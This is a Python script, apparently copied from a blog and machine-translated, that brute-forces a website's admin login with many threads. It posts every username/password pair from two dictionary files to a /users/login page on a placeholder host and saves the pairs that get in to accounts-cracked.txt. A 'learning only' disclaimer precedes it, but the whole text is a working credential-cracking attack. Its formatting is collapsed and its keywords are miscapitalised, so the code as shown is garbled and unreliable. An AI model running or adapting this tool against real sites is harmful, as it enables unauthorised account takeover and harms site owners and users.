#-*-coding:utf-8-*-#the use of Python-written multi-threaded blasting background user name + password (own dictionary), more practical, even in the information security so much attention today, or some people do not add authentication code or access restrictions such as the login authentication method, so it is easy to be weak password blasting tool down, (this code is limited to learning practical , prohibit web attacks, and do not accept legal liability)ImportUrllib2ImportUrllibImportHttplibImportThreading Headers= {"Content-type":"application/x-www-form-urlencoded", "Connection":"keep-alive", "Referer":"http://www.xxxxx.com/"};#Referer: is the access source address of the agent#lock = Threading. Lock ()defTryUser (user,password):#Print User,password GlobalHeadersGlobalOutFile Conn= Httplib. Httpconnection ("www.xxxxx.com")#remote domain name ifLen (user) < 3:#limit user name length to exclude useless data from the dictionary return #Active Exit Thread Else: #Lock.acquire () # multi-threaded Operation file, pre-lock, release after use #line = Infile.readline () #userData = Line.strip (). split (' # ') # strip () default whitespace removal characters include ', ' \ t ', ' \ n ', etc. #lock.release ()User=User.strip () passwd=Password.strip () params= Urllib.urlencode ({'username': user,'Password': Passwd}) Conn.request (method="POST", url="/users/login", body=params, Headers=headers)#Background PathResponseText = Conn.getresponse (). read (). decode ('UTF8')#page Encoding #print ResponseText # for the first time can be printed to see if parsing if notResponsetext.find (u'username or password is not correct, please re-enter!') >0:Print '-----find user:', user,'with password:', passwd,'-----'Outfile.write (user+' '+ passwd +'\ n') returnOutFile= Open ('Accounts-cracked.txt','W') if __name__=='__main__': Tsk=[]#Create a thread poolWith open (r'User.dic','R') as FUser:#use with as to open the file without closing the file yourself, because he will self-close at the right time (similar to the using (...) in C #). {} Interface)With open (r'Pass.dic','R') as Fpass: forUserinchFuser.readlines (): forPasswordinchfpass.readlines (): T= Threading. Thread (target = tryuser,args=(USER,PASSWORD)) T.daemon= False#set not to process daemonTsk.append (t)#T.start ()Fpass.seek (0)#Remember to move the file back to the top of the file, or the first of the outer loops will appear, because the inner layer #after the iteration (readlines () is the form of an iterator, and once the file pointer refers to the end of the file, the iterator #also end) the second time there is no password in fpass, that is to say for password in fpass.readlines (): #is empty, so the inner loop here is not executed, so it is also the problem of the iterator zeroing (C + + itertor often) #Join () No parameter is completely blocking the main thread, waiting for the thread to finish having parameters that is,#wait one second after the main thread does not block the thread, continue to execute the main thread, here means one second to open a thread#the join () cannot be called before thread start, because join () is a thread run-time dispatch forTinchtsk:t.start () T.join (1) Print "all Thread Ok,maybe not"outfile.close ()
Python-written HTTP background Weak-password blasting tool